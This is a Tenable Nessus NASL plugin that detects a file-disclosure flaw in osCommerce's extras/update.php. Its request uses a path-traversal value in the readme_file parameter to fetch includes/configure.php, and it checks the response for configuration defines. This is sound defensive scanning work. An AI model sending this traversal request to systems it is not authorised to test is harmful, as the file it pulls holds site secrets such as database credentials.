#
# (C) Tenable Network Security
#


if (description) {
  script_id(19256);
  script_version("$Revision: 1.2 $");

  script_cve_id("CAN-2005-2330");
  script_bugtraq_id(14294);

  name["english"] = "osCommerce readme_file Parameter File Disclosure Vulnerability";
  script_name(english:name["english"]);
 
  desc["english"] = "
The remote host is running osCommerce, an open-source e-commerce
system. 

The osCommerce installation on the remote host has a supplementary
script, 'extras/update.php', that fails to validate user-supplied
input to the 'readme_file' parameter before using that to display a
file.  An attacker can exploit this flaw to read arbitrary files on
the remote host, such as the '.htaccess' file used to protect the
admin directory. 

See also : http://www.oscommerce.com/community/bugs,2835
Solution : Remove the 'extras/update.php' script.
Risk factor : Medium";
  script_description(english:desc["english"]);
 
  summary["english"] = "Checks for readme_file parameter file disclosure vulnerability in osCommerce";
  script_summary(english:summary["english"]);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005 Tenable Network Security");

  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through CGI directories.
foreach dir (cgi_dirs()) {
  # Try to exploit the flaw.
  req = http_get(
    item:string(
      dir, "/extras/update.php?",
      # Grab osCommerce's configuration file.
      "readme_file=../includes/configure.php"
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if it looks like osCommerce's configuration file.
  if (egrep(string:res, pattern:"define\('(DIR_WS_HTTP_CATALOG|DIR_WS_IMAGES|DIR_WS_INCLUDES)")) {
    security_warning(port);
    exit(0);
  }
}
